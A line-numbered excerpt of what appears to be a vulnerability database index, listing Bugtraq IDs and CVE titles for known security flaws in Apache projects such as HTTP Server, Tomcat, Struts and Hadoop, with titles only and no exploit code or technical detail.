13940| [103750] Apache Hive CVE-2018-1284 Security Bypass Vulnerability
13941| [103692] Apache Ignite CVE-2018-1295 Arbitrary Code Execution Vulnerability
13942| [103528] Apache HTTP Server CVE-2018-1302 Denial of Service Vulnerability
13943| [103525] Apache HTTP Server CVE-2017-15715 Remote Security Bypass Vulnerability
13944| [103524] Apache HTTP Server CVE-2018-1312 Remote Security Bypass Vulnerability
13945| [103522] Apache HTTP Server CVE-2018-1303 Denial of Service Vulnerability
13946| [103520] Apache HTTP Server CVE-2018-1283 Remote Security Vulnerability
13947| [103516] Apache Struts CVE-2018-1327 Denial of Service Vulnerability
13948| [103515] Apache HTTP Server CVE-2018-1301 Denial of Service Vulnerability
13949| [103512] Apache HTTP Server CVE-2017-15710 Denial of Service Vulnerability
13950| [103508] Apache Syncope CVE-2018-1321 Multiple Remote Code Execution Vulnerabilities
13951| [103507] Apache Syncope CVE-2018-1322 Multiple Information Disclosure Vulnerabilities
13952| [103490] Apache Commons Compress CVE-2018-1324 Multiple Denial Of Service Vulnerabilities
13953| [103434] APACHE Allura CVE-2018-1319 HTTP Response Splitting Vulnerability
13954| [103389] Apache Tomcat JK Connector CVE-2018-1323 Directory Traversal Vulnerability
13955| [103222] Apache CloudStack CVE-2013-4317 Information Disclosure Vulnerability
13956| [103219] Apache Xerces-C CVE-2017-12627 Null Pointer Dereference Denial of Service Vulnerability
13957| [103206] Apache Geode CVE-2017-15693 Remote Code Execution Vulnerability
13958| [103205] Apache Geode CVE-2017-15692 Remote Code Execution Vulnerability
13959| [103170] Apache Tomcat CVE-2018-1304 Security Bypass Vulnerability
13960| [103144] Apache Tomcat CVE-2018-1305 Security Bypass Vulnerability
13961| [103102] Apache Oozie CVE-2017-15712 Information Disclosure Vulnerability
13962| [103098] Apache Karaf CVE-2016-8750 LDAP Injection Vulnerability
13963| [103069] Apache Tomcat CVE-2017-15706 Remote Security Weakness
13964| [103068] Apache JMeter CVE-2018-1287 Security Bypass Vulnerability
13965| [103067] Apache Qpid Dispatch Router 'router_core/connections.c' Denial of Service Vulnerability
13966| [103036] Apache CouchDB CVE-2017-12636 Remote Code Execution Vulnerability
13967| [103025] Apache Thrift CVE-2016-5397 Remote Command Injection Vulnerability
13968| [102879] Apache POI CVE-2017-12626 Multiple Denial of Service Vulnerabilities
13969| [102842] Apache NiFi CVE-2017-12632 Host Header Injection Vulnerability
13970| [102815] Apache NiFi CVE-2017-15697 Multiple Cross Site Scripting Vulnerabilities
13971| [102488] Apache Geode CVE-2017-9795 Remote Code Execution Vulnerability
13972| [102229] Apache Sling CVE-2017-15700 Information Disclosure Vulnerability
13973| [102226] Apache Drill CVE-2017-12630 Cross Site Scripting Vulnerability
13974| [102154] Multiple Apache Products CVE-2017-15708 Remote Code Execution Vulnerability
13975| [102127] Apache CXF Fediz CVE-2017-12631 Multiple Cross Site Request Forgery Vulnerabilities
13976| [102041] Apache Qpid Broker-J CVE-2017-15701 Denial of Service Vulnerability
13977| [102040] Apache Qpid Broker CVE-2017-15702 Security Weakness
13978| [102021] Apache Struts CVE-2017-15707 Denial of Service Vulnerability
13979| [101980] EMC RSA Authentication Agent for Web: Apache Web Server Authentication Bypass Vulnerability
13980| [101876] Apache Camel CVE-2017-12634 Deserialization Remote Code Execution Vulnerability
13981| [101874] Apache Camel CVE-2017-12633 Deserialization Remote Code Execution Vulnerability
13982| [101872] Apache Karaf CVE-2014-0219 Local Denial of Service Vulnerability
13983| [101868] Apache CouchDB CVE-2017-12635 Remote Privilege Escalation Vulnerability
13984| [101859] Apache CXF CVE-2017-12624 Denial of Service Vulnerability
13985| [101844] Apache Sling Servlets Post CVE-2017-11296 Cross Site Scripting Vulnerability
13986| [101686] Apache Hive CVE-2017-12625 Information Disclosure Vulnerability
13987| [101644] Apache Wicket CVE-2012-5636 Cross Site Scripting Vulnerability
13988| [101631] Apache Traffic Server CVE-2015-3249 Multiple Remote Code Execution Vulnerabilities
13989| [101630] Apache Traffic Server CVE-2014-3624 Access Bypass Vulnerability
13990| [101625] Apache jUDDI CVE-2009-1197 Security Bypass Vulnerability
13991| [101623] Apache jUDDI CVE-2009-1198 Cross Site Scripting Vulnerability
13992| [101620] Apache Subversion 'libsvn_fs_fs/fs_fs.c' Denial of Service Vulnerability
13993| [101585] Apache OpenOffice Multiple Remote Code Execution Vulnerabilities
13994| [101577] Apache Wicket CVE-2016-6806 Cross Site Request Forgery Vulnerability
13995| [101575] Apache Wicket CVE-2014-0043 Information Disclosure Vulnerability
13996| [101570] Apache Geode CVE-2017-9797 Information Disclosure Vulnerability
13997| [101562] Apache Derby CVE-2010-2232 Arbitrary File Overwrite Vulnerability
13998| [101560] Apache Portable Runtime Utility CVE-2017-12613 Multiple Information Disclosure Vulnerabilities
13999| [101558] Apache Portable Runtime Utility Local Out-of-Bounds Read Denial of Service Vulnerability
14000| [101532] Apache James CVE-2017-12628 Arbitrary Command Execution Vulnerability
14001| [101516] Apache HTTP Server CVE-2017-12171 Security Bypass Vulnerability
14002| [101261] Apache Solr/Lucene CVE-2017-12629 Information Disclosure and Remote Code Execution Vulnerabilities
14003| [101230] Apache Roller CVE-2014-0030 XML External Entity Injection Vulnerability
14004| [101173] Apache IMPALA CVE-2017-9792 Information Disclosure Vulnerability
14005| [101052] Apache Commons Jelly CVE-2017-12621 Security Bypass Vulnerability
14006| [101027] Apache Mesos CVE-2017-7687 Denial of Service Vulnerability
14007| [101023] Apache Mesos CVE-2017-9790 Denial of Service Vulnerability
14008| [100954] Apache Tomcat CVE-2017-12617 Incomplete Fix Remote Code Execution Vulnerability
14009| [100946] Apache Wicket CVE-2014-7808 Cross Site Request Forgery Vulnerability
14010| [100901] Apache Tomcat CVE-2017-12615 Remote Code Execution Vulnerability
14011| [100897] Apache Tomcat CVE-2017-12616 Information Disclosure Vulnerability
14012| [100880] Apache Directory LDAP API CVE-2015-3250 Unspecified Information Disclosure Vulnerability
14013| [100872] Apache HTTP Server CVE-2017-9798 Information Disclosure Vulnerability
14014| [100870] Apache Solr CVE-2017-9803 Remote Privilege Escalation Vulnerability
14015| [100859] puppetlabs-apache CVE-2017-2299 Information Disclosure Vulnerability
14016| [100829] Apache Struts CVE-2017-12611 Remote Code Execution Vulnerability
14017| [100823] Apache Spark CVE-2017-12612 Deserialization Remote Code Execution Vulnerability
14018| [100612] Apache Struts CVE-2017-9804 Incomplete Fix Denial of Service Vulnerability
14019| [100611] Apache Struts CVE-2017-9793 Denial of Service Vulnerability
14020| [100609] Apache Struts CVE-2017-9805 Remote Code Execution Vulnerability
14021| [100587] Apache Atlas CVE-2017-3155 Cross Frame Scripting Vulnerability
14022| [100581] Apache Atlas CVE-2017-3154 Information Disclosure Vulnerability
14023| [100578] Apache Atlas CVE-2017-3153 Cross Site Scripting Vulnerability
14024| [100577] Apache Atlas CVE-2017-3152 Cross Site Scripting Vulnerability
14025| [100547] Apache Atlas CVE-2017-3151 HTML Injection Vulnerability
14026| [100536] Apache Atlas CVE-2017-3150 Cross Site Scripting Vulnerability
14027| [100449] Apache Pony Mail CVE-2016-4460 Authentication Bypass Vulnerability
14028| [100447] Apache2Triad Multiple Security Vulnerabilities
14029| [100284] Apache Sling Servlets Post CVE-2017-9802 Cross Site Scripting Vulnerability
14030| [100280] Apache Tomcat CVE-2017-7674 Security Bypass Vulnerability
14031| [100259] Apache Subversion CVE-2017-9800 Remote Command Execution Vulnerability
14032| [100256] Apache Tomcat CVE-2017-7675 Directory Traversal Vulnerability
14033| [100235] Apache Storm CVE-2017-9799 Remote Code Execution Vulnerability
14034| [100082] Apache Commons Email CVE-2017-9801 SMTP Header Injection Vulnerability
14035| [99873] Apache Sling XSS Protection API CVE-2016-6798 XML External Entity Injection Vulnerability
14036| [99870] Apache Sling API CVE-2016-5394 Cross Site Scripting Vulnerability
14037| [99603] Apache Spark CVE-2017-7678 Cross Site Scripting Vulnerability
14038| [99592] Apache OpenMeetings CVE-2017-7685 Security Bypass Vulnerability
14039| [99587] Apache OpenMeetings CVE-2017-7673 Security Bypass Vulnerability
14040| [99586] Apache OpenMeetings CVE-2017-7688 Security Bypass Vulnerability
14041| [99584] Apache OpenMeetings CVE-2017-7684 Denial of Service Vulnerability
14042| [99577] Apache OpenMeetings CVE-2017-7663 Cross Site Scripting Vulnerability
14043| [99576] Apache OpenMeetings CVE-2017-7664 XML External Entity Injection Vulnerability
14044| [99569] Apache HTTP Server CVE-2017-9788 Memory Corruption Vulnerability
14045| [99568] Apache HTTP Server CVE-2017-9789 Denial of Service Vulnerability
14046| [99563] Apache Struts CVE-2017-7672 Denial of Service Vulnerability
14047| [99562] Apache Struts Spring AOP Functionality Denial of Service Vulnerability
14048| [99509] Apache Impala CVE-2017-5652 Information Disclosure Vulnerability
14049| [99508] Apache IMPALA CVE-2017-5640 Authentication Bypass Vulnerability
14050| [99486] Apache Traffic Control CVE-2017-7670 Denial of Service Vulnerability
14051| [99485] Apache Solr CVE-2017-7660 Security Bypass Vulnerability
14052| [99484] Apache Struts CVE-2017-9791 Remote Code Execution Vulnerability
14053| [99292] Apache Ignite CVE-2017-7686 Information Disclosure Vulnerability
14054| [99170] Apache HTTP Server CVE-2017-7679 Buffer Overflow Vulnerability
14055| [99137] Apache HTTP Server CVE-2017-7668 Denial of Service Vulnerability
14056| [99135] Apache HTTP Server CVE-2017-3167 Authentication Bypass Vulnerability
14057| [99134] Apache HTTP Server CVE-2017-3169 Denial of Service Vulnerability
14058| [99132] Apache HTTP Server CVE-2017-7659 Denial of Service Vulnerability
14059| [99112] Apache Thrift CVE-2015-3254 Denial of Service Vulnerability
14060| [99067] Apache Ranger CVE-2016-8751 HTML Injection Vulnerability
14061| [99018] Apache NiFi CVE-2017-7667 Cross Frame Scripting Vulnerability
14062| [99009] Apache NiFi CVE-2017-7665 Cross Site Scripting Vulnerability
14063| [98961] Apache Ranger CVE-2017-7677 Security Bypass Vulnerability
14064| [98958] Apache Ranger CVE-2017-7676 Security Bypass Vulnerability
14065| [98888] Apache Tomcat CVE-2017-5664 Security Bypass Vulnerability
14066| [98814] Apache Zookeeper CVE-2017-5637 Denial of Service Vulnerability
14067| [98795] Apache Hadoop CVE-2017-7669 Remote Privilege Escalation Vulnerability
14068| [98739] Apache Knox CVE-2017-5646 User Impersonation Vulnerability
14069| [98669] Apache Hive CVE-2016-3083 Security Bypass Vulnerability
14070| [98646] Apache Atlas CVE-2016-8752 Information Disclosure Vulnerability
14071| [98570] Apache Archiva CVE-2017-5657 Multiple Cross-Site Request Forgery Vulnerabilities
14072| [98489] Apache CXF Fediz CVE-2017-7661 Multiple Cross Site Request Forgery Vulnerabilities
14073| [98485] Apache CXF Fediz CVE-2017-7662 Cross Site Request Forgery Vulnerability
14074| [98466] Apache Ambari CVE-2017-5655 Insecure Temporary File Handling Vulnerability
14075| [98365] Apache Cordova For Android CVE-2016-6799 Information Disclosure Vulnerability
14076| [98025] Apache Hadoop CVE-2017-3161 Cross Site Scripting Vulnerability
14077| [98017] Apache Hadoop CVE-2017-3162 Input Validation Vulnerability
14078| [97971] Apache CXF CVE-2017-5656 Information Disclosure Vulnerability
14079| [97968] Apache CXF CVE-2017-5653 Spoofing Vulnerability
14080| [97967] Apache ActiveMQ CVE-2015-7559 Denial of Service Vulnerability
14081| [97949] Apache Traffic Server CVE-2017-5659 Denial of Service Vulnerability
14082| [97948] Apache Batik CVE-2017-5662 XML External Entity Information Disclosure Vulnerability
14083| [97947] Apache FOP CVE-2017-5661 XML External Entity Information Disclosure Vulnerability
14084| [97945] Apache Traffic Server CVE-2016-5396 Denial of Service Vulnerability
14085| [97702] Apache Log4j CVE-2017-5645 Remote Code Execution Vulnerability
14086| [97582] Apache CXF CVE-2016-6812 Cross Site Scripting Vulnerability
14087| [97579] Apache CXF JAX-RS CVE-2016-8739 XML External Entity Injection Vulnerability
14088| [97544] Apache Tomcat CVE-2017-5651 Information Disclosure Vulnerability
14089| [97531] Apache Tomcat CVE-2017-5650 Denial of Service Vulnerability
14090| [97530] Apache Tomcat CVE-2017-5648 Information Disclosure Vulnerability
14091| [97509] Apache Ignite CVE-2016-6805 Information Disclosure and XML External Entity Injection Vulnerabilities
14092| [97383] Apache Flex BlazeDS CVE-2017-5641 Remote Code Execution Vulnerability
14093| [97378] Apache Geode CVE-2017-5649 Information Disclosure Vulnerability
14094| [97229] Apache Ambari CVE-2016-4976 Local Information Disclosure Vulnerability
14095| [97226] Apache Camel CVE-2017-5643 Server Side Request Forgery Security Bypass Vulnerability
14096| [97184] Apache Ambari CVE-2016-6807 Remote Command Execution Vulnerability
14097| [97179] Apache Camel CVE-2016-8749 Java Deserialization Multiple Remote Code Execution Vulnerabilities
14098| [96983] Apache POI CVE-2017-5644 Denial Of Service Vulnerability
14099| [96895] Apache Tomcat CVE-2016-8747 Information Disclosure Vulnerability
14100| [96731] Apache NiFi CVE-2017-5636 Remote Code Injection Vulnerability
14101| [96730] Apache NiFi CVE-2017-5635 Security Bypass Vulnerability
14102| [96729] Apache Struts CVE-2017-5638 Remote Code Execution Vulnerability
14103| [96540] IBM Development Package for Apache Spark CVE-2016-4970 Denial of Service Vulnerability
14104| [96398] Apache CXF CVE-2017-3156 Information Disclosure Vulnerability
14105| [96321] Apache Camel CVE-2017-3159 Remote Code Execution Vulnerability
14106| [96293] Apache Tomcat 'http11/AbstractInputBuffer.java' Denial of Service Vulnerability
14107| [96228] Apache Brooklyn Cross Site Request Forgery and Multiple Cross Site Scripting Vulnerabilities
14108| [95998] Apache Ranger CVE-2016-8746 Security Bypass Vulnerability
14109| [95929] Apache Groovy CVE-2016-6497 Information Disclosure Vulnerability
14110| [95838] Apache Cordova For Android CVE-2017-3160 Man in the Middle Security Bypass Vulnerability
14111| [95675] Apache Struts Remote Code Execution Vulnerability
14112| [95621] Apache NiFi CVE-2106-8748 Cross Site Scripting Vulnerability
14113| [95429] Apache Groovy CVE-2016-6814 Remote Code Execution Vulnerability
14114| [95335] Apache Hadoop CVE-2016-3086 Information Disclosure Vulnerability
14115| [95168] Apache Wicket CVE-2016-6793 Denial of Service Vulnerability
14116| [95136] Apache Qpid Broker for Java CVE-2016-8741 Remote Information Disclosure Vulnerability
14117| [95078] Apache HTTP Server CVE-2016-0736 Remote Security Vulnerability
14118| [95077] Apache HTTP Server CVE-2016-8743 Security Bypass Vulnerability
14119| [95076] Apache HTTP Server CVE-2016-2161 Denial of Service Vulnerability
14120| [95020] Apache Tika CVE-2015-3271 Remote Information Disclosure Vulnerability
14121| [94950] Apache Hadoop CVE-2016-5001 Local Information Disclosure Vulnerability
14122| [94882] Apache ActiveMQ CVE-2016-6810 HTML Injection Vulnerability
14123| [94828] Apache Tomcat CVE-2016-8745 Information Disclosure Vulnerability
14124| [94766] Apache CouchDB CVE-2016-8742 Local Privilege Escalation Vulnerability
14125| [94657] Apache Struts CVE-2016-8738 Denial of Service Vulnerability
14126| [94650] Apache HTTP Server CVE-2016-8740 Denial of Service Vulnerability
14127| [94588] Apache Subversion CVE-2016-8734 XML External Entity Denial of Service Vulnerability
14128| [94513] Apache Karaf CVE-2016-8648 Remote Code Execution Vulnerability
14129| [94463] Apache Tomcat CVE-2016-8735 Remote Code Execution Vulnerability
14130| [94462] Apache Tomcat CVE-2016-6817 Denial of Service Vulnerability
14131| [94461] Apache Tomcat CVE-2016-6816 Security Bypass Vulnerability
14132| [94418] Apache OpenOffice CVE-2016-6803 Local Privilege Escalation Vulnerability
14133| [94247] Apache Tika CVE-2016-6809 Remote Code Execution Vulnerability
14134| [94221] Apache Ranger CVE-2016-6815 Local Privilege Escalation Vulnerability
14135| [94145] Apache OpenMeetings CVE-2016-8736 Remote Code Execution Vulnerability
14136| [93945] Apache CloudStack CVE-2016-6813 Authorization Bypass Vulnerability
14137| [93944] Apache Tomcat Security Manager CVE-2016-6796 Security Bypass Vulnerability
14138| [93943] Apache Tomcat CVE-2016-6794 Security Bypass Vulnerability
14139| [93942] Apache Tomcat Security Manager CVE-2016-5018 Security Bypass Vulnerability
14140| [93940] Apache Tomcat CVE-2016-6797 Security Bypass Vulnerability
14141| [93939] Apache Tomcat CVE-2016-0762 Information Disclosure Vulnerability
14142| [93774] Apache OpenOffice CVE-2016-6804 DLL Loading Remote Code Execution Vulnerability
14143| [93773] Apache Struts CVE-2016-6795 Directory Traversal Vulnerability
14144| [93478] Apache Tomcat CVE-2016-6325 Local Privilege Escalation Vulnerability
14145| [93472] Apache Tomcat CVE-2016-5425 Insecure File Permissions Vulnerability
14146| [93429] Apache Tomcat JK Connector CVE-2016-6808 Remote Buffer Overflow Vulnerability
14147| [93263] Apache Tomcat CVE-2016-1240 Local Privilege Escalation Vulnerability
14148| [93236] Apache MyFaces Trinidad CVE-2016-5019 Remote Code Execution Vulnerability
14149| [93142] Apache ActiveMQ Artemis CVE-2016-4978 Remote Code Execution Vulnerability
14150| [93132] Apache Derby CVE-2015-1832 XML External Entity Information Disclosure Vulnerability
14151| [93044] Apache Zookeeper CVE-2016-5017 Buffer Overflow Vulnerability
14152| [92966] Apache Jackrabbit CVE-2016-6801 Cross-Site Request Forgery Vulnerability
14153| [92947] Apache Shiro CVE-2016-6802 Remote Security Bypass Vulnerability
14154| [92905] Apache CXF Fediz CVE-2016-4464 Security Bypass Vulnerability
14155| [92577] Apache Ranger CVE-2016-5395 HTML Injection Vulnerability
14156| [92331] Apache HTTP Server CVE-2016-1546 Remote Denial of Service Vulnerability
14157| [92328] Apache Hive CVE-2016-0760 Multiple Remote Code Execution Vulnerabilities
14158| [92320] Apache APR-util and httpd CVE-2016-6312 Denial of Service Vulnerability
14159| [92100] Apache POI CVE-2016-5000 XML External Entity Injection Vulnerability
14160| [92079] Apache OpenOffice CVE-2016-1513 Remote Code Execution Vulnerability
14161| [91818] Apache Tomcat CVE-2016-5388 Security Bypass Vulnerability
14162| [91816] Apache HTTP Server CVE-2016-5387 Security Bypass Vulnerability
14163| [91788] Apache Qpid Proton CVE-2016-4467 Certificate Verification Security Bypass Vulnerability
14164| [91738] Apache XML-RPC CVE-2016-5003 Remote Code Execution Vulnerability
14165| [91736] Apache XML-RPC Multiple Security Vulnerabilities
14166| [91707] Apache Archiva CVE-2016-5005 HTML Injection Vulnerability
14167| [91703] Apache Archiva CVE-2016-4469 Multiple Cross-Site Request Forgery Vulnerabilities
14168| [91566] Apache HTTP Server CVE-2016-4979 Authentication Bypass Vulnerability
14169| [91537] Apache QPID CVE-2016-4974 Deserialization Security Bypass Vulnerability
14170| [91501] Apache Xerces-C CVE-2016-4463 Stack Buffer Overflow Vulnerability
14171| [91453] Apache Commons FileUpload CVE-2016-3092 Denial Of Service Vulnerability
14172| [91284] Apache Struts CVE-2016-4431 Security Bypass Vulnerability
14173| [91282] Apache Struts CVE-2016-4433 Security Bypass Vulnerability
14174| [91281] Apache Struts CVE-2016-4430 Cross-Site Request Forgery Vulnerability
14175| [91280] Apache Struts CVE-2016-4436 Security Bypass Vulnerability
14176| [91278] Apache Struts CVE-2016-4465 Denial of Service Vulnerability
14177| [91277] Apache Struts Incomplete Fix Remote Code Execution Vulnerability
14178| [91275] Apache Struts CVE-2016-4438 Remote Code Execution Vulnerability
14179| [91217] Apache Continuum 'saveInstallation.action' Command Execution Vulnerability
14180| [91141] Apache CloudStack CVE-2016-3085 Authentication Bypass Vulnerability
14181| [91068] Apache Struts CVE-2016-1181 Remote Code Execution Vulnerability
14182| [91067] Apache Struts CVE-2016-1182 Security Bypass Vulnerability
14183| [91024] Apache Shiro CVE-2016-4437 Information Disclosure Vulnerability
14184| [90988] Apache Ranger CVE-2016-2174 SQL Injection Vulnerability
14185| [90961] Apache Struts CVE-2016-3093 Denial of Service Vulnerability
14186| [90960] Apache Struts CVE-2016-3087 Remote Code Execution Vulnerability
14187| [90921] Apache Qpid CVE-2016-4432 Authentication Bypass Vulnerability
14188| [90920] Apache Qpid CVE-2016-3094 Denial of Service Vulnerability
14189| [90902] Apache PDFBox CVE-2016-2175 XML External Entity Injection Vulnerability
14190| [90897] Apache Tika CVE-2016-4434 XML External Entity Injection Vulnerability
14191| [90827] Apache ActiveMQ CVE-2016-3088 Multiple Arbitrary File Upload Vulnerabilities
14192| [90755] Apache Ambari CVE-2016-0707 Multiple Local Information Disclosure Vulnerabilities
14193| [90482] Apache CVE-2004-1387 Local Security Vulnerability
14194| [89762] Apache CVE-2001-1556 Remote Security Vulnerability
14195| [89417] Apache Subversion CVE-2016-2167 Authentication Bypass Vulnerability
14196| [89326] RETIRED: Apache Subversion CVE-2016-2167 Security Bypass Vulnerability
14197| [89320] Apache Subversion CVE-2016-2168 Remote Denial of Service Vulnerability
14198| [88826] Apache Struts CVE-2016-3082 Remote Code Execution Vulnerability
14199| [88797] Apache Cordova For iOS CVE-2015-5208 Arbitrary Code Execution Vulnerability
14200| [88764] Apache Cordova iOS CVE-2015-5207 Multiple Security Bypass Vulnerabilities
14201| [88701] Apache CVE-2001-1449 Remote Security Vulnerability
14202| [88635] Apache CVE-2000-1204 Remote Security Vulnerability
14203| [88590] Apache WWW server CVE-1999-1199 Denial-Of-Service Vulnerability
14204| [88496] Apache CVE-2000-1206 Remote Security Vulnerability
14205| [87828] Apache CVE-1999-1237 Remote Security Vulnerability
14206| [87784] Apache CVE-1999-1293 Denial-Of-Service Vulnerability
14207| [87327] Apache Struts CVE-2016-3081 Remote Code Execution Vulnerability
14208| [86622] Apache Stats CVE-2007-0975 Remote Security Vulnerability
14209| [86399] Apache CVE-2007-1743 Local Security Vulnerability
14210| [86397] Apache CVE-2007-1742 Local Security Vulnerability
14211| [86311] Apache Struts CVE-2016-4003 Cross Site Scripting Vulnerability
14212| [86174] Apache Wicket CVE-2015-5347 Cross Site Scripting Vulnerability
14213| [85971] Apache OFBiz CVE-2016-2170 Java Deserialization Remote Code Execution Vulnerability
14214| [85967] Apache OFBiz CVE-2015-3268 HTML Injection Vulnerability
14215| [85759] Apache Jetspeed CVE-2016-2171 Unauthorized Access Vulnerability
14216| [85758] Apache Jetspeed CVE-2016-0712 Cross Site Scripting Vulnerability
14217| [85756] Apache Jetspeed CVE-2016-0710 Multiple SQL Injection Vulnerabilities
14218| [85755] Apache Jetspeed CVE-2016-0711 Multiple HTML Injection Vulnerabilities
14219| [85754] Apache Jetspeed CVE-2016-0709 Directory Traversal Vulnerability
14220| [85730] Apache Subversion CVE-2015-5343 Integer Overflow Vulnerability
14221| [85691] Apache Ranger CVE-2016-0735 Security Bypass Vulnerability
14222| [85578] Apache ActiveMQ CVE-2010-1244 Cross-Site Request Forgery Vulnerability
14223| [85554] Apache OpenMeetings CVE-2016-2164 Multiple Information Disclosure Vulnerabilities
14224| [85553] Apache OpenMeetings CVE-2016-0783 Information Disclosure Vulnerability
14225| [85552] Apache OpenMeetings CVE-2016-2163 HTML Injection Vulnerability
14226| [85550] Apache OpenMeetings CVE-2016-0784 Directory Traversal Vulnerability
14227| [85386] Apache Hadoop CVE-2015-7430 Local Privilege Escalation Vulnerability
14228| [85377] Apache Qpid Proton Python API CVE-2016-2166 Man in the Middle Security Bypass Vulnerability
14229| [85205] Apache Solr CVE-2015-8796 Cross Site Scripting Vulnerability
14230| [85203] Apache Solr CVE-2015-8795 Mulitple HTML Injection Vulnerabilities
14231| [85163] Apache Geronimo CVE-2008-0732 Local Security Vulnerability
14232| [85131] Apache Struts 'TextParseUtil.translateVariables()' Method Remote Code Execution Vulnerability
14233| [85070] Apache Struts CVE-2016-2162 Cross Site Scripting Vulnerability
14234| [85066] Apache Struts CVE-2016-0785 Remote Code Execution Vulnerability
14235| [84422] Apache TomEE CVE-2016-0779 Unspecified Security Vulnerability
14236| [84321] Apache ActiveMQ CVE-2016-0734 Clickjacking Vulnerability
14237| [84316] Apache ActiveMQ CVE-2016-0782 Multiple Cross Site Scripting Vulnerabilities
14238| [83910] Apache Wicket CVE-2015-7520 Cross Site Scripting Vulnerability
14239| [83423] Apache Xerces-C CVE-2016-0729 Buffer Overflow Vulnerability
14240| [83330] Apache Tomcat CVE-2015-5351 Cross Site Request Forgery Vulnerability
14241| [83329] Apache Tomcat CVE-2015-5174 Directory Traversal Vulnerability
14242| [83328] Apache Tomcat CVE-2015-5345 Directory Traversal Vulnerability
14243| [83327] Apache Tomcat Security Manager CVE-2016-0714 Remote Code Execution Vulnerability
14244| [83326] Apache Tomcat CVE-2016-0763 Security Bypass Vulnerability
14245| [83324] Apache Tomcat Security Manager CVE-2016-0706 Information Disclosure Vulnerability
14246| [83323] Apache Tomcat CVE-2015-5346 Session Fixation Vulnerability
14247| [83259] Apache Hadoop CVE-2015-1776 Information Disclosure Vulnerability
14248| [83243] Apache Solr CVE-2015-8797 Cross Site Scripting Vulnerability
14249| [83119] Apache Sling CVE-2016-0956 Information Disclosure Vulnerability
14250| [83002] Apache CVE-2000-1205 Cross-Site Scripting Vulnerability
14251| [82871] Apache Ranger Authentication Bypass and Security Bypass Vulnerabilities
14252| [82800] Apache CloudStack CVE-2015-3251 Information Disclosure Vulnerability
14253| [82798] Apache CloudStack CVE-2015-3252 Authentication Bypass Vulnerability
14254| [82732] Apache Gallery CVE-2003-0771 Local Security Vulnerability
14255| [82676] Apache CVE-2003-1581 Cross-Site Scripting Vulnerability
| [82550] Apache Struts CVE-2015-5209 Security Bypass Vulnerability
| [82300] Apache Subversion CVE-2015-5259 Integer Overflow Vulnerability
| [82260] Apache Camel CVE-2015-5344 Remote Code Execution Vulnerability
| [82234] Apache Hive CVE-2015-7521 Security Bypass Vulnerability
| [82082] Apache CVE-1999-0289 Remote Security Vulnerability
| [81821] Apache Distribution for Solaris CVE-2007-2080 SQL-Injection Vulnerability
| [80696] Apache Camel CVE-2015-5348 Information Disclosure Vulnerability
| [80525] Apache CVE-2003-1580 Remote Security Vulnerability
| [80354] Drupal Apache Solr Search Module Access Bypass Vulnerability
| [80193] Apache CVE-1999-0107 Denial-Of-Service Vulnerability
| [79812] Apache Directory Studio CVE-2015-5349 Command Injection Vulnerability
| [79744] Apache HBase CVE-2015-1836 Unauthorized Access Vulnerability
| [79204] Apache TomEE 'EjbObjectInputStream' Remote Code Execution Vulnerability
| [77679] Apache Cordova For Android CVE-2015-8320 Weak Randomization Security Bypass Vulnerability
| [77677] Apache Cordova For Android CVE-2015-5256 Security Bypass Vulnerability
| [77591] Apache CXF SAML SSO Processing CVE-2015-5253 Security Bypass Vulnerability
| [77521] Apache Commons Collections 'InvokerTransformer.java' Remote Code Execution Vulnerability
| [77110] Apache HttpComponents HttpClient CVE-2015-5262 Denial of Service Vulnerability
| [77086] Apache Ambari CVE-2015-1775 Server Side Request Forgery Security Bypass Vulnerability
| [77085] Apache Ambari CVE-2015-3270 Remote Privilege Escalation Vulnerability
| [77082] Apache Ambari 'targetURI' Parameter Open Redirection Vulnerability
| [77059] Apache Ambari CVE-2015-3186 Cross Site Scripting Vulnerability
| [76933] Apache James Server Unspecified Command Execution Vulnerability
| [76832] Apache cordova-plugin-file-transfer CVE-2015-5204 HTTP Header Injection Vulnerability
| [76625] Apache Struts CVE-2015-5169 Cross Site Scripting Vulnerability
| [76624] Apache Struts CVE-2015-2992 Cross Site Scripting Vulnerability
| [76522] Apache Tapestry CVE-2014-1972 Security Bypass Vulnerability
| [76486] Apache CXF Fediz CVE-2015-5175 Denial of Service Vulnerability
| [76452] Apache ActiveMQ CVE-2015-1830 Directory Traversal Vulnerability
| [76446] Apache Subversion 'libsvn_fs_fs/tree.c' Denial of Service Vulnerability
| [76274] Apache Subversion CVE-2015-3184 Information Disclosure Vulnerability
| [76273] Apache Subversion CVE-2015-3187 Information Disclosure Vulnerability
| [76272] Apache ActiveMQ CVE-2014-3576 Denial of Service Vulnerability
| [76221] Apache Ranger CVE-2015-0266 Access Bypass Vulnerability
| [76208] Apache Ranger CVE-2015-0265 JavaScript Code Injection Vulnerability
| [76025] Apache ActiveMQ Artemis CVE-2015-3208 XML External Entity Information Disclosure Vulnerability
| [75965] Apache HTTP Server CVE-2015-3185 Security Bypass Vulnerability
| [75964] Apache HTTP Server CVE-2015-0253 Remote Denial of Service Vulnerability
| [75963] Apache HTTP Server CVE-2015-3183 Security Vulnerability
| [75940] Apache Struts CVE-2015-1831 Security Bypass Vulnerability
| [75919] Apache Groovy CVE-2015-3253 Remote Code Execution Vulnerability
| [75338] Apache Storm CVE-2015-3188 Remote Code Execution Vulnerability
| [75275] Drupal Apache Solr Real-Time Module Access Bypass Vulnerability
| [74866] Apache Cordova For Android CVE-2015-1835 Security Bypass Vulnerability
| [74839] Apache Sling API and Sling Servlets CVE-2015-2944 Cross Site Scripting Vulnerability
| [74761] Apache Jackrabbit CVE-2015-1833 XML External Entity Information Disclosure Vulnerability
| [74686] Apache Ambari '/var/lib/ambari-server/ambari-env.sh' Local Privilege Escalation Vulnerability
| [74665] Apache Tomcat CVE-2014-7810 Security Bypass Vulnerability
| [74475] Apache Tomcat CVE-2014-0230 Denial of Service Vulnerability
| [74423] Apache Struts CVE-2015-0899 Security Bypass Vulnerability
| [74338] Apache OpenOffice HWP Filter Memory Corruption Vulnerability
| [74265] Apache Tomcat 'mod_jk' CVE-2014-8111 Information Disclosure Vulnerability
| [74260] Apache Subversion CVE-2015-0248 Multiple Denial of Service Vulnerabilities
| [74259] Apache Subversion 'deadprops.c' Security Bypass Vulnerability
| [74204] PHP 'sapi/apache2handler/sapi_apache2.c' Remote Code Execution Vulnerability
| [74158] Apache HTTP Server 'protocol.c' Remote Denial of Service Vulnerability
| [73954] Apache Flex 'asdoc/templates/index.html' Cross Site Scripting Vulnerability
| [73851] Apache2 CVE-2012-0216 Cross-Site Scripting Vulnerability
| [73478] Apache Cassandra CVE-2015-0225 Remote Code Execution Vulnerability
| [73041] Apache HTTP Server 'mod_lua' Module Denial of Service Vulnerability
